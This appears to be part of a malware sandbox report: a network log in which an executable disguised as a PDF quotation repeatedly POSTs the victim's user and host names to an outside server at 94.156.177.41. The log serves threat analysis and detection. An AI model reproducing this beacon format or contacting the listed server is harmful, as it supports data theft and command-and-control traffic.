Jan 7, 2025 12:32:40.109919071 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:40.116039038 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:40.837862968 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:40 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49786	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:40.982682943 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:40.987508059 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:41.705457926 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:41 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49787	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:41.856955051 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:41.861753941 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:42.590842962 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:42 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49788	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:42.732088089 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:42.736881018 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:43.480823994 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:43 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49789	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:43.625214100 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:43.630024910 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:44.368278027 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:44 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49790	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:44.524878025 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:44.529691935 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:45.260442972 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:45 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49791	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:45.406728983 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:45.411818027 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:46.120095968 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:46 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49792	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:46.288589954 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:46.293457031 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:47.026279926 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:46 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49793	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:47.173974037 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:47.179130077 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:47.914865971 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:47 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	49794	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:48.068721056 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:48.074620008 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:48.821242094 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:48 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	49795	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:48.979871988 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:48.984689951 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:49.713093996 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:49 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	49796	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:49.857615948 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:49.862472057 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:50.609062910 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:50 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	49798	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:50.752672911 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:50.758629084 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:51.495048046 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:51 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	49799	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:51.650327921 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:51.655149937 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:52.422197104 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:52 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	49800	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:52.562263012 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:52.567085028 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:53.323579073 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:53 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	49801	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:53.472599030 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:53.479624987 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:54.426455021 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:54 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	49803	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:54.579602957 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:54.584481001 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:55.294728041 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:55 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	49804	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:55.441423893 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:55.446640968 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:56.184849024 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:56 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	49810	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:56.328866005 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:56.333833933 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:57.071692944 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:56 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	49816	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:57.232475996 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:57.237308979 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:57.962167978 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:57 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	49822	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:58.116379976 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:32:58.121179104 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:32:58.853651047 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:32:58 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	49828	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:32:58.998151064 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
